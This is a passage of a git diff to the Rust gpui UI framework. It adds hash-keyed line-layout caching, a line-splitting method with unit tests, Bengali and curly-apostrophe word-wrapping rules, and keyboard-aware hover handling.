+ pub fn new(platform_text_system: Arc) -> Self { TextSystem { platform_text_system, font_metrics: RwLock::default(), @@ -372,7 +373,8 @@ pub struct WindowTextSystem { } impl WindowTextSystem { - pub(crate) fn new(text_system: Arc) -> Self { + /// Create a new WindowTextSystem with the given TextSystem. + pub fn new(text_system: Arc) -> Self { Self { line_layout_cache: LineLayoutCache::new(text_system.platform_text_system.clone()), text_system, @@ -438,6 +440,74 @@ impl WindowTextSystem { } } + /// Shape the given line using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for the text. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + /// + /// Like [`Self::shape_line`], this must be used only for single-line text (no `\n`). 
+ pub fn shape_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> ShapedLine { + let mut decoration_runs = SmallVec::<[DecorationRun; 32]>::new(); + for run in runs { + if let Some(last_run) = decoration_runs.last_mut() + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + && last_run.background_color == run.background_color + { + last_run.len += run.len as u32; + continue; + } + decoration_runs.push(DecorationRun { + len: run.len as u32, + color: run.color, + background_color: run.background_color, + underline: run.underline, + strikethrough: run.strikethrough, + }); + } + + let mut used_force_width = force_width; + let layout = self.layout_line_by_hash( + text_hash, + text_len, + font_size, + runs, + used_force_width, + || { + let text = materialize_text(); + debug_assert!( + text.find('\n').is_none(), + "text argument should not contain newlines" + ); + text + }, + ); + + // We only materialize actual text on cache miss; on hit we avoid allocations. + // Since `ShapedLine` carries a `SharedString`, use an empty placeholder for hits. + // NOTE: Callers must not rely on `ShapedLine.text` for content when using this API. + let text: SharedString = SharedString::new_static(""); + + ShapedLine { + layout, + text, + decoration_runs, + } + } + /// Shape a multi line string of text, at the given font_size, for painting to the screen. /// Subsets of the text can be styled independently with the `runs` parameter. /// If `wrap_width` is provided, the line breaks will be adjusted to fit within the given width. @@ -627,6 +697,130 @@ impl WindowTextSystem { layout } + + /// Probe the line layout cache using a caller-provided content hash, without allocating. 
+ /// + /// Returns `Some(layout)` if the layout is already cached in either the current frame + /// or the previous frame. Returns `None` if it is not cached. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn try_layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + ) -> Option> { + let mut last_run = None::<&TextRun>; + let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default(); + font_runs.clear(); + + for run in runs.iter() { + let decoration_changed = if let Some(last_run) = last_run + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + // we do not consider differing background color relevant, as it does not affect glyphs + // && last_run.background_color == run.background_color + { + false + } else { + last_run = Some(run); + true + }; + + let font_id = self.resolve_font(&run.font); + if let Some(font_run) = font_runs.last_mut() + && font_id == font_run.font_id + && !decoration_changed + { + font_run.len += run.len; + } else { + font_runs.push(FontRun { + len: run.len, + font_id, + }); + } + } + + let layout = self.line_layout_cache.try_layout_line_by_hash( + text_hash, + text_len, + font_size, + &font_runs, + force_width, + ); + + self.font_runs_pool.lock().push(font_runs); + + layout + } + + /// Layout the given line of text using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for the text. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). 
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> Arc { + let mut last_run = None::<&TextRun>; + let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default(); + font_runs.clear(); + + for run in runs.iter() { + let decoration_changed = if let Some(last_run) = last_run + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + // we do not consider differing background color relevant, as it does not affect glyphs + // && last_run.background_color == run.background_color + { + false + } else { + last_run = Some(run); + true + }; + + let font_id = self.resolve_font(&run.font); + if let Some(font_run) = font_runs.last_mut() + && font_id == font_run.font_id + && !decoration_changed + { + font_run.len += run.len; + } else { + font_runs.push(FontRun { + len: run.len, + font_id, + }); + } + } + + let layout = self.line_layout_cache.layout_line_by_hash( + text_hash, + text_len, + font_size, + &font_runs, + force_width, + materialize_text, + ); + + self.font_runs_pool.lock().push(font_runs); + + layout + } } #[derive(Hash, Eq, PartialEq)] @@ -802,6 +996,11 @@ impl TextRun { #[repr(C)] pub struct GlyphId(pub u32); +/// Parameters for rendering a glyph, used as cache keys for raster bounds. +/// +/// This struct identifies a specific glyph rendering configuration including +/// font, size, subpixel positioning, and scale factor. It's used to look up +/// cached raster bounds and sprite atlas entries. 
#[derive(Clone, Debug, PartialEq)] #[expect(missing_docs)] pub struct RenderGlyphParams { diff --git a/crates/gpui/src/text_system/line.rs b/crates/gpui/src/text_system/line.rs index c87e051ad3b4e5fc86d17ad0e6168553108175fa..7b5714188ff97d0169806ac5da9f039f9be2c16a 100644 --- a/crates/gpui/src/text_system/line.rs +++ b/crates/gpui/src/text_system/line.rs @@ -1,12 +1,24 @@ use crate::{ - App, Bounds, Half, Hsla, LineLayout, Pixels, Point, Result, SharedString, StrikethroughStyle, - TextAlign, UnderlineStyle, Window, WrapBoundary, WrappedLineLayout, black, fill, point, px, - size, + App, Bounds, DevicePixels, Half, Hsla, LineLayout, Pixels, Point, RenderGlyphParams, Result, + ShapedGlyph, ShapedRun, SharedString, StrikethroughStyle, TextAlign, UnderlineStyle, Window, + WrapBoundary, WrappedLineLayout, black, fill, point, px, size, }; use derive_more::{Deref, DerefMut}; use smallvec::SmallVec; use std::sync::Arc; +/// Pre-computed glyph data for efficient painting without per-glyph cache lookups. +/// +/// This is produced by `ShapedLine::compute_glyph_raster_data` during prepaint +/// and consumed by `ShapedLine::paint_with_raster_data` during paint. +#[derive(Clone, Debug)] +pub struct GlyphRasterData { + /// The raster bounds for each glyph, in paint order. + pub bounds: Vec>, + /// The render params for each glyph (needed for sprite atlas lookup). + pub params: Vec, +} + /// Set the text decoration for a run of text. #[derive(Debug, Clone)] pub struct DecorationRun { @@ -44,6 +56,14 @@ impl ShapedLine { self.layout.len } + /// The width of the shaped line in pixels. + /// + /// This is the glyph advance width computed by the text shaping system and is useful for + /// incrementally advancing a "pen" when painting multiple fragments on the same row. + pub fn width(&self) -> Pixels { + self.layout.width + } + /// Override the len, useful if you're rendering text a /// as text b (e.g. rendering invisibles). 
pub fn with_len(mut self, len: usize) -> Self { @@ -108,6 +128,120 @@ impl ShapedLine { Ok(()) } + + /// Split this shaped line at a byte index, returning `(prefix, suffix)`. + /// + /// - `prefix` contains glyphs for bytes `[0, byte_index)` with original positions. + /// Its width equals the x-advance up to the split point. + /// - `suffix` contains glyphs for bytes `[byte_index, len)` with positions + /// shifted left so the first glyph starts at x=0, and byte indices rebased to 0. + /// - Decoration runs are partitioned at the boundary; a run that straddles it is + /// split into two with adjusted lengths. + /// - `font_size`, `ascent`, and `descent` are copied to both halves. + pub fn split_at(&self, byte_index: usize) -> (ShapedLine, ShapedLine) { + let x_offset = self.layout.x_for_index(byte_index); + + // Partition glyph runs. A single run may contribute glyphs to both halves. + let mut left_runs = Vec::new(); + let mut right_runs = Vec::new(); + + for run in &self.layout.runs { + let split_pos = run.glyphs.partition_point(|g| g.index < byte_index); + + if split_pos > 0 { + left_runs.push(ShapedRun { + font_id: run.font_id, + glyphs: run.glyphs[..split_pos].to_vec(), + }); + } + + if split_pos < run.glyphs.len() { + let right_glyphs = run.glyphs[split_pos..] + .iter() + .map(|g| ShapedGlyph { + id: g.id, + position: point(g.position.x - x_offset, g.position.y), + index: g.index - byte_index, + is_emoji: g.is_emoji, + }) + .collect(); + right_runs.push(ShapedRun { + font_id: run.font_id, + glyphs: right_glyphs, + }); + } + } + + // Partition decoration runs. A run straddling the boundary is split into two. 
+ let mut left_decorations = SmallVec::new(); + let mut right_decorations = SmallVec::new(); + let mut decoration_offset = 0u32; + let split_point = byte_index as u32; + + for decoration in &self.decoration_runs { + let run_end = decoration_offset + decoration.len; + + if run_end <= split_point { + left_decorations.push(decoration.clone()); + } else if decoration_offset >= split_point { + right_decorations.push(decoration.clone()); + } else { + let left_len = split_point - decoration_offset; + let right_len = run_end - split_point; + left_decorations.push(DecorationRun { + len: left_len, + color: decoration.color, + background_color: decoration.background_color, + underline: decoration.underline, + strikethrough: decoration.strikethrough, + }); + right_decorations.push(DecorationRun { + len: right_len, + color: decoration.color, + background_color: decoration.background_color, + underline: decoration.underline, + strikethrough: decoration.strikethrough, + }); + } + + decoration_offset = run_end; + } + + // Split text + let left_text = SharedString::new(self.text[..byte_index].to_string()); + let right_text = SharedString::new(self.text[byte_index..].to_string()); + + let left_width = x_offset; + let right_width = self.layout.width - left_width; + + let left = ShapedLine { + layout: Arc::new(LineLayout { + font_size: self.layout.font_size, + width: left_width, + ascent: self.layout.ascent, + descent: self.layout.descent, + runs: left_runs, + len: byte_index, + }), + text: left_text, + decoration_runs: left_decorations, + }; + + let right = ShapedLine { + layout: Arc::new(LineLayout { + font_size: self.layout.font_size, + width: right_width, + ascent: self.layout.ascent, + descent: self.layout.descent, + runs: right_runs, + len: self.layout.len - byte_index, + }), + text: right_text, + decoration_runs: right_decorations, + }; + + (left, right) + } } /// A line of text that has been shaped, decorated, and wrapped by the text layout system. 
@@ -594,3 +728,268 @@ fn aligned_origin_x( TextAlign::Right => origin.x + align_width - line_width, } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{FontId, GlyphId}; + + /// Helper: build a ShapedLine from glyph descriptors without the platform text system. + /// Each glyph is described as (byte_index, x_position). + fn make_shaped_line( + text: &str, + glyphs: &[(usize, f32)], + width: f32, + decorations: &[DecorationRun], + ) -> ShapedLine { + let shaped_glyphs: Vec = glyphs + .iter() + .map(|&(index, x)| ShapedGlyph { + id: GlyphId(0), + position: point(px(x), px(0.0)), + index, + is_emoji: false, + }) + .collect(); + + ShapedLine { + layout: Arc::new(LineLayout { + font_size: px(16.0), + width: px(width), + ascent: px(12.0), + descent: px(4.0), + runs: vec![ShapedRun { + font_id: FontId(0), + glyphs: shaped_glyphs, + }], + len: text.len(), + }), + text: SharedString::new(text.to_string()), + decoration_runs: SmallVec::from(decorations.to_vec()), + } + } + + #[test] + fn test_split_at_invariants() { + // Split "abcdef" at every possible byte index and verify structural invariants. 
+ let line = make_shaped_line( + "abcdef", + &[ + (0, 0.0), + (1, 10.0), + (2, 20.0), + (3, 30.0), + (4, 40.0), + (5, 50.0), + ], + 60.0, + &[], + ); + + for i in 0..=6 { + let (left, right) = line.split_at(i); + + assert_eq!( + left.width() + right.width(), + line.width(), + "widths must sum at split={i}" + ); + assert_eq!( + left.len() + right.len(), + line.len(), + "lengths must sum at split={i}" + ); + assert_eq!( + format!("{}{}", left.text.as_ref(), right.text.as_ref()), + "abcdef", + "text must concatenate at split={i}" + ); + assert_eq!(left.font_size, line.font_size, "font_size at split={i}"); + assert_eq!(right.ascent, line.ascent, "ascent at split={i}"); + assert_eq!(right.descent, line.descent, "descent at split={i}"); + } + + // Edge: split at 0 produces no left runs, full content on right + let (left, right) = line.split_at(0); + assert_eq!(left.runs.len(), 0); + assert_eq!(right.runs[0].glyphs.len(), 6); + + // Edge: split at end produces full content on left, no right runs + let (left, right) = line.split_at(6); + assert_eq!(left.runs[0].glyphs.len(), 6); + assert_eq!(right.runs.len(), 0); + } + + #[test] + fn test_split_at_glyph_rebasing() { + // Two font runs (simulating a font fallback boundary at byte 3): + // run A (FontId 0): glyphs at bytes 0,1,2 positions 0,10,20 + // run B (FontId 1): glyphs at bytes 3,4,5 positions 30,40,50 + // Successive splits simulate the incremental splitting done during wrap. 
+ let line = ShapedLine { + layout: Arc::new(LineLayout { + font_size: px(16.0), + width: px(60.0), + ascent: px(12.0), + descent: px(4.0), + runs: vec![ + ShapedRun { + font_id: FontId(0), + glyphs: vec![ + ShapedGlyph { + id: GlyphId(0), + position: point(px(0.0), px(0.0)), + index: 0, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(10.0), px(0.0)), + index: 1, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(20.0), px(0.0)), + index: 2, + is_emoji: false, + }, + ], + }, + ShapedRun { + font_id: FontId(1), + glyphs: vec![ + ShapedGlyph { + id: GlyphId(0), + position: point(px(30.0), px(0.0)), + index: 3, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(40.0), px(0.0)), + index: 4, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(50.0), px(0.0)), + index: 5, + is_emoji: false, + }, + ], + }, + ], + len: 6, + }), + text: SharedString::new("abcdef".to_string()), + decoration_runs: SmallVec::new(), + }; + + // First split at byte 2 — mid-run in run A + let (first, remainder) = line.split_at(2); + assert_eq!(first.text.as_ref(), "ab"); + assert_eq!(first.runs.len(), 1); + assert_eq!(first.runs[0].font_id, FontId(0)); + + // Remainder "cdef" should have two runs: tail of A (1 glyph) + all of B (3 glyphs) + assert_eq!(remainder.text.as_ref(), "cdef"); + assert_eq!(remainder.runs.len(), 2); + assert_eq!(remainder.runs[0].font_id, FontId(0)); + assert_eq!(remainder.runs[0].glyphs.len(), 1); + assert_eq!(remainder.runs[0].glyphs[0].index, 0); + assert_eq!(remainder.runs[0].glyphs[0].position.x, px(0.0)); + assert_eq!(remainder.runs[1].font_id, FontId(1)); + assert_eq!(remainder.runs[1].glyphs[0].index, 1); + assert_eq!(remainder.runs[1].glyphs[0].position.x, px(10.0)); + + // Second split at byte 2 within remainder — crosses the run boundary + let (second, final_part) = remainder.split_at(2); + assert_eq!(second.text.as_ref(), "cd"); + 
assert_eq!(final_part.text.as_ref(), "ef"); + assert_eq!(final_part.runs[0].glyphs[0].index, 0); + assert_eq!(final_part.runs[0].glyphs[0].position.x, px(0.0)); + + // Widths must sum across all three pieces + assert_eq!( + first.width() + second.width() + final_part.width(), + line.width() + ); + } + + #[test] + fn test_split_at_decorations() { + // Three decoration runs: red [0..2), green [2..5), blue [5..6). + // Split at byte 3 — red goes entirely left, green straddles, blue goes entirely right. + let red = Hsla { + h: 0.0, + s: 1.0, + l: 0.5, + a: 1.0, + }; + let green = Hsla { + h: 0.3, + s: 1.0, + l: 0.5, + a: 1.0, + }; + let blue = Hsla { + h: 0.6, + s: 1.0, + l: 0.5, + a: 1.0, + }; + + let line = make_shaped_line( + "abcdef", + &[ + (0, 0.0), + (1, 10.0), + (2, 20.0), + (3, 30.0), + (4, 40.0), + (5, 50.0), + ], + 60.0, + &[ + DecorationRun { + len: 2, + color: red, + background_color: None, + underline: None, + strikethrough: None, + }, + DecorationRun { + len: 3, + color: green, + background_color: None, + underline: None, + strikethrough: None, + }, + DecorationRun { + len: 1, + color: blue, + background_color: None, + underline: None, + strikethrough: None, + }, + ], + ); + + let (left, right) = line.split_at(3); + + // Left: red(2) + green(1) — green straddled, left portion has len 1 + assert_eq!(left.decoration_runs.len(), 2); + assert_eq!(left.decoration_runs[0].len, 2); + assert_eq!(left.decoration_runs[0].color, red); + assert_eq!(left.decoration_runs[1].len, 1); + assert_eq!(left.decoration_runs[1].color, green); + + // Right: green(2) + blue(1) — green straddled, right portion has len 2 + assert_eq!(right.decoration_runs.len(), 2); + assert_eq!(right.decoration_runs[0].len, 2); + assert_eq!(right.decoration_runs[0].color, green); + assert_eq!(right.decoration_runs[1].len, 1); + assert_eq!(right.decoration_runs[1].color, blue); + } +} diff --git a/crates/gpui/src/text_system/line_layout.rs b/crates/gpui/src/text_system/line_layout.rs index 
78ab21b3d324674b0f34d9ab418893430df70f2a..8f3d7563d068979defa8b3f93367a2c9b7102cc1 100644 --- a/crates/gpui/src/text_system/line_layout.rs +++ b/crates/gpui/src/text_system/line_layout.rs @@ -401,12 +401,25 @@ struct FrameCache { wrapped_lines: FxHashMap, Arc>, used_lines: Vec>, used_wrapped_lines: Vec>, + + // Content-addressable caches keyed by caller-provided text hash + layout params. + // These allow cache hits without materializing a contiguous `SharedString`. + // + // IMPORTANT: To support allocation-free lookups, we store these maps using a key type + // (`HashedCacheKeyRef`) that can be computed without building a contiguous `&str`/`SharedString`. + // On miss, we allocate once and store under an owned `HashedCacheKey`. + lines_by_hash: FxHashMap, Arc>, + wrapped_lines_by_hash: FxHashMap, Arc>, + used_lines_by_hash: Vec>, + used_wrapped_lines_by_hash: Vec>, } #[derive(Clone, Default)] pub(crate) struct LineLayoutIndex { lines_index: usize, wrapped_lines_index: usize, + lines_by_hash_index: usize, + wrapped_lines_by_hash_index: usize, } impl LineLayoutCache { @@ -423,6 +436,8 @@ impl LineLayoutCache { LineLayoutIndex { lines_index: frame.used_lines.len(), wrapped_lines_index: frame.used_wrapped_lines.len(), + lines_by_hash_index: frame.used_lines_by_hash.len(), + wrapped_lines_by_hash_index: frame.used_wrapped_lines_by_hash.len(), } } @@ -445,6 +460,24 @@ impl LineLayoutCache { } current_frame.used_wrapped_lines.push(key.clone()); } + + for key in &previous_frame.used_lines_by_hash + [range.start.lines_by_hash_index..range.end.lines_by_hash_index] + { + if let Some((key, line)) = previous_frame.lines_by_hash.remove_entry(key) { + current_frame.lines_by_hash.insert(key, line); + } + current_frame.used_lines_by_hash.push(key.clone()); + } + + for key in &previous_frame.used_wrapped_lines_by_hash + [range.start.wrapped_lines_by_hash_index..range.end.wrapped_lines_by_hash_index] + { + if let Some((key, line)) = 
previous_frame.wrapped_lines_by_hash.remove_entry(key) { + current_frame.wrapped_lines_by_hash.insert(key, line); + } + current_frame.used_wrapped_lines_by_hash.push(key.clone()); + } } pub fn truncate_layouts(&self, index: LineLayoutIndex) { @@ -453,6 +486,12 @@ impl LineLayoutCache { current_frame .used_wrapped_lines .truncate(index.wrapped_lines_index); + current_frame + .used_lines_by_hash + .truncate(index.lines_by_hash_index); + current_frame + .used_wrapped_lines_by_hash + .truncate(index.wrapped_lines_by_hash_index); } pub fn finish_frame(&self) { @@ -463,6 +502,11 @@ impl LineLayoutCache { curr_frame.wrapped_lines.clear(); curr_frame.used_lines.clear(); curr_frame.used_wrapped_lines.clear(); + + curr_frame.lines_by_hash.clear(); + curr_frame.wrapped_lines_by_hash.clear(); + curr_frame.used_lines_by_hash.clear(); + curr_frame.used_wrapped_lines_by_hash.clear(); } pub fn layout_wrapped_line( @@ -590,6 +634,165 @@ impl LineLayoutCache { layout } } + + /// Try to retrieve a previously-shaped line layout using a caller-provided content hash. + /// + /// This is a *non-allocating* cache probe: it does not materialize any text. If the layout + /// is not already cached in either the current frame or previous frame, returns `None`. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). 
+ pub fn try_layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[FontRun], + force_width: Option, + ) -> Option> { + let key_ref = HashedCacheKeyRef { + text_hash, + text_len, + font_size, + runs, + wrap_width: None, + force_width, + }; + + let current_frame = self.current_frame.read(); + if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return Some(layout.clone()); + } + + let previous_frame = self.previous_frame.lock(); + if let Some((_, layout)) = previous_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return Some(layout.clone()); + } + + None + } + + /// Layout a line of text using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for `text`. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[FontRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> Arc { + let key_ref = HashedCacheKeyRef { + text_hash, + text_len, + font_size, + runs, + wrap_width: None, + force_width, + }; + + // Fast path: already cached (no allocation). 
+ let current_frame = self.current_frame.upgradable_read(); + if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return layout.clone(); + } + + let mut current_frame = RwLockUpgradableReadGuard::upgrade(current_frame); + + // Try to reuse from previous frame without allocating; do a linear scan to find a matching key. + // (We avoid `drain()` here because it would eagerly move all entries.) + let mut previous_frame = self.previous_frame.lock(); + if let Some(existing_key) = previous_frame + .used_lines_by_hash + .iter() + .find(|key| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) + .cloned() + { + if let Some((key, layout)) = previous_frame.lines_by_hash.remove_entry(&existing_key) { + current_frame + .lines_by_hash + .insert(key.clone(), layout.clone()); + current_frame.used_lines_by_hash.push(key); + return layout; + } + } + + let text = materialize_text(); + let mut layout = self + .platform_text_system + .layout_line(&text, font_size, runs); + + if let Some(force_width) = force_width { + let mut glyph_pos = 0; + for run in layout.runs.iter_mut() { + for glyph in run.glyphs.iter_mut() { + if (glyph.position.x - glyph_pos * force_width).abs() > px(1.) 
{ + glyph.position.x = glyph_pos * force_width; + } + glyph_pos += 1; + } + } + } + + let key = Arc::new(HashedCacheKey { + text_hash, + text_len, + font_size, + runs: SmallVec::from(runs), + wrap_width: None, + force_width, + }); + let layout = Arc::new(layout); + current_frame + .lines_by_hash + .insert(key.clone(), layout.clone()); + current_frame.used_lines_by_hash.push(key); + layout + } } /// A run of text with a single font. @@ -622,12 +825,80 @@ struct CacheKeyRef<'a> { force_width: Option, } +#[derive(Clone, Debug)] +struct HashedCacheKey { + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: SmallVec<[FontRun; 1]>, + wrap_width: Option, + force_width: Option, +} + +#[derive(Copy, Clone)] +struct HashedCacheKeyRef<'a> { + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &'a [FontRun], + wrap_width: Option, + force_width: Option, +} + impl PartialEq for dyn AsCacheKeyRef + '_ { fn eq(&self, other: &dyn AsCacheKeyRef) -> bool { self.as_cache_key_ref() == other.as_cache_key_ref() } } +impl PartialEq for HashedCacheKey { + fn eq(&self, other: &Self) -> bool { + self.text_hash == other.text_hash + && self.text_len == other.text_len + && self.font_size == other.font_size + && self.runs.as_slice() == other.runs.as_slice() + && self.wrap_width == other.wrap_width + && self.force_width == other.force_width + } +} + +impl Eq for HashedCacheKey {} + +impl Hash for HashedCacheKey { + fn hash(&self, state: &mut H) { + self.text_hash.hash(state); + self.text_len.hash(state); + self.font_size.hash(state); + self.runs.as_slice().hash(state); + self.wrap_width.hash(state); + self.force_width.hash(state); + } +} + +impl PartialEq for HashedCacheKeyRef<'_> { + fn eq(&self, other: &Self) -> bool { + self.text_hash == other.text_hash + && self.text_len == other.text_len + && self.font_size == other.font_size + && self.runs == other.runs + && self.wrap_width == other.wrap_width + && self.force_width == other.force_width + } +} + +impl Eq for 
HashedCacheKeyRef<'_> {} + +impl Hash for HashedCacheKeyRef<'_> { + fn hash(&self, state: &mut H) { + self.text_hash.hash(state); + self.text_len.hash(state); + self.font_size.hash(state); + self.runs.hash(state); + self.wrap_width.hash(state); + self.force_width.hash(state); + } +} + impl Eq for dyn AsCacheKeyRef + '_ {} impl Hash for dyn AsCacheKeyRef + '_ { diff --git a/crates/gpui/src/text_system/line_wrapper.rs b/crates/gpui/src/text_system/line_wrapper.rs index 07df35472b0bd3f91b8096439ed82cf811b45c77..ffc433c671ba8f13aff1655b0aed91f95d0ff22a 100644 --- a/crates/gpui/src/text_system/line_wrapper.rs +++ b/crates/gpui/src/text_system/line_wrapper.rs @@ -236,10 +236,13 @@ impl LineWrapper { matches!(c, '\u{1E00}'..='\u{1EFF}') || // Latin Extended Additional matches!(c, '\u{0300}'..='\u{036F}') || // Combining Diacritical Marks + // Bengali (https://en.wikipedia.org/wiki/Bengali_(Unicode_block)) + matches!(c, '\u{0980}'..='\u{09FF}') || + // Some other known special characters that should be treated as word characters, - // e.g. `a-b`, `var_name`, `I'm`, '@mention`, `#hashtag`, `100%`, `3.1415`, + // e.g. `a-b`, `var_name`, `I'm`/`won’t`, '@mention`, `#hashtag`, `100%`, `3.1415`, // `2^3`, `a~b`, `a=1`, `Self::new`, etc. - matches!(c, '-' | '_' | '.' | '\'' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') || + matches!(c, '-' | '_' | '.' | '\'' | '’' | '‘' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') || // `⋯` character is special used in Zed, to keep this at the end of the line. 
matches!(c, '⋯') } @@ -835,6 +838,8 @@ mod tests { assert_word("a=1"); assert_word("Self::is_word_char"); assert_word("more⋯"); + assert_word("won’t"); + assert_word("‘twas"); // Space assert_not_word("foo bar"); @@ -856,6 +861,10 @@ mod tests { assert_word("АБВГДЕЖЗИЙКЛМНОП"); // Vietnamese (https://github.com/zed-industries/zed/issues/23245) assert_word("ThậmchíđếnkhithuachạychúngcònnhẫntâmgiếtnốtsốđôngtùchínhtrịởYênBáivàCaoBằng"); + // Bengali + assert_word("গিয়েছিলেন"); + assert_word("ছেলে"); + assert_word("হচ্ছিল"); // non-word characters assert_not_word("你好"); diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index df5948cb99e75a1f15d5b9a63cb1c3a5a29fac03..f9885f634d962b167bcf32cc459d5bf6e0d5661e 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -560,12 +560,20 @@ pub enum WindowControlArea { pub struct HitboxId(u64); impl HitboxId { - /// Checks if the hitbox with this ID is currently hovered. Except when handling + /// Checks if the hitbox with this ID is currently hovered. Returns `false` during keyboard + /// input modality so that keyboard navigation suppresses hover highlights. Except when handling /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse /// events or paint hover styles. /// /// See [`Hitbox::is_hovered`] for details. pub fn is_hovered(self, window: &Window) -> bool { + // If this hitbox has captured the pointer, it's always considered hovered + if window.captured_hitbox == Some(self) { + return true; + } + if window.last_input_was_keyboard() { + return false; + } let hit_test = &window.mouse_hit_test; for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) { if self == *id { @@ -604,13 +612,15 @@ pub struct Hitbox { } impl Hitbox { - /// Checks if the hitbox is currently hovered. Except when handling `ScrollWheelEvent`, this is - /// typically what you want when determining whether to handle mouse events or paint hover - /// styles. 
+ /// Checks if the hitbox is currently hovered. Returns `false` during keyboard input modality + /// so that keyboard navigation suppresses hover highlights. Except when handling + /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse + /// events or paint hover styles. /// /// This can return `false` even when the hitbox contains the mouse, if a hitbox in front of /// this sets `HitboxBehavior::BlockMouse` (`InteractiveElement::occlude`) or - /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`). + /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`), + /// or if the current input modality is keyboard (see [`Window::last_input_was_keyboard`]). /// /// Handling of `ScrollWheelEvent` should typically use `should_handle_scroll` instead. /// Concretely, this is due to use-cases like overlays that cause the elements under to be @@ -726,6 +736,7 @@ pub(crate) struct DeferredDraw { parent_node: DispatchNodeId, element_id_stack: SmallVec<[ElementId; 32]>, text_style_stack: Vec, + content_mask: Option>, rem_size: Pixels, element: Option, absolute_offset: Point, @@ -821,6 +832,11 @@ impl Frame { self.tab_stops.clear(); self.focus = None; + #[cfg(any(test, feature = "test-support"))] + { + self.debug_bounds.clear(); + } + #[cfg(any(feature = "inspector", debug_assertions))] { self.next_inspector_instance_ids.clear(); @@ -935,6 +951,7 @@ pub struct Window { pub(crate) bounds_observers: SubscriberSet<(), AnyObserver>, appearance: WindowAppearance, pub(crate) appearance_observers: SubscriberSet<(), AnyObserver>, + pub(crate) button_layout_observers: SubscriberSet<(), AnyObserver>, active: Rc>, hovered: Rc>, pub(crate) needs_present: Rc>, @@ -951,6 +968,9 @@ pub struct Window { pub(crate) pending_input_observers: SubscriberSet<(), AnyObserver>, prompt: Option, pub(crate) client_inset: Option, + /// The hitbox that has captured the pointer, if any. 
